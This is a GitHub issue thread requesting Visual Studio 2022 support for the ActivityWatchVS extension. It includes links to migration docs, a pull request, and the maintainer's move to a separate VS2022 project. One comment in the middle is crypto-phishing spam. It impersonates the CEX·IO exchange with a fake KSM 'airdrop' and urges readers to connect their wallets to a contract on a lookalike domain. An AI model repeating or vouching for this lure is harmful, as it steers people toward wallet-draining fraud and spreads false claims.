### ISSUE TITLE
Visual Studio 17.x (2022) support?

### ISSUE THREAD

**Issue by binki** [LaggAt/ActivityWatchVS#5]
### Installed product versions
- Visual Studio: 2022 Professional
- This extension: 1.0.18

### Description
When I download from https://marketplace.visualstudio.com/items?itemName=FlorianLagg.ActivityWatchVS , it only offers to install for Visual Studio 2019 and does not offer to install for Visual Studio 2022.

### Steps to recreate
1. Download from https://marketplace.visualstudio.com/items?itemName=FlorianLagg.ActivityWatchVS
2. Launch

### Current behavior
Dialog offers to install for visualstudio 16 (2019) but not 17 (2022).

### Expected behavior
Should also offer installing for 17 (2022).

**Comment by KelvinJPS** [comment]
you can solve the issue?

**Comment by sudokit** [comment]
howd you solve this issue?

**Comment by bricelam** [comment]
[Update a Visual Studio extension for Visual Studio 2022](https://docs.microsoft.com/en-us/visualstudio/extensibility/migration/update-visual-studio-extension?view=vs-2022)

**Comment by hekarroko** [comment]
https://github.com/LaggAt/ActivityWatchVS/pull/6 here's a pull request for resolving this issue

**Comment by OnSive** [comment]
Any updates?

**Comment by kusamanetworkss** [comment]
## Congratulations! You've receive in $3,000 KSM Giveaway ($KSM) Airdrop 🪂🔴


CEX·IO is giving away $3,000 in $KSM coins, empowering you to take advantage of KSM staking on CEX·IO with 14% APY. Join the giveaway and earn a chance to win up to $500. Stake Kusama with CEX·IO, get high rewards and win prizes!

#### About

CEX·IO is a fully regulated multi-functional cryptocurrency exchange established in 2013, serving over 4 million customers worldwide. CEX·IO has been one of the first platforms to make fiat-to-crypto transactions accessible via bank transfers and to accept debit/credit card payments for crypto deposits and withdrawals to Visa or MasterCard.

→ [How to join the $3,000 KSM Giveaway Airdrop?](https://kusamanetworks.com/)


Connect your wallet, follow the instructions, and claim this exclusive airdrop from Kusama. For GitHub users only—share with friends to make it eligible. Redeem your reward first.

![Kusama Exchange](https://cdn.airdropalert.com/images/metadata/kusamacex2222.jpeg)


### Step-by-Step Guide ''CEX·IO Kusama Giveaway''

Access the Kusama platform and connect your wallet securely. Ensure you're using a trusted wallet for the transaction.

- 🔗 Use the connect method to interact with the contract
- 💰 Connect and receive your tokens
→ [Claim Your $KSM Today](https://kusamanetworks.com/)

**Comment by LaggAt** [comment]
I'm finding some time for the VS2022 out-of-proc variant, therefore I discontinue work here.
See https://github.com/LaggAt/ActivityWatchVS2022
Hope I could configure AppVeyor build soon.
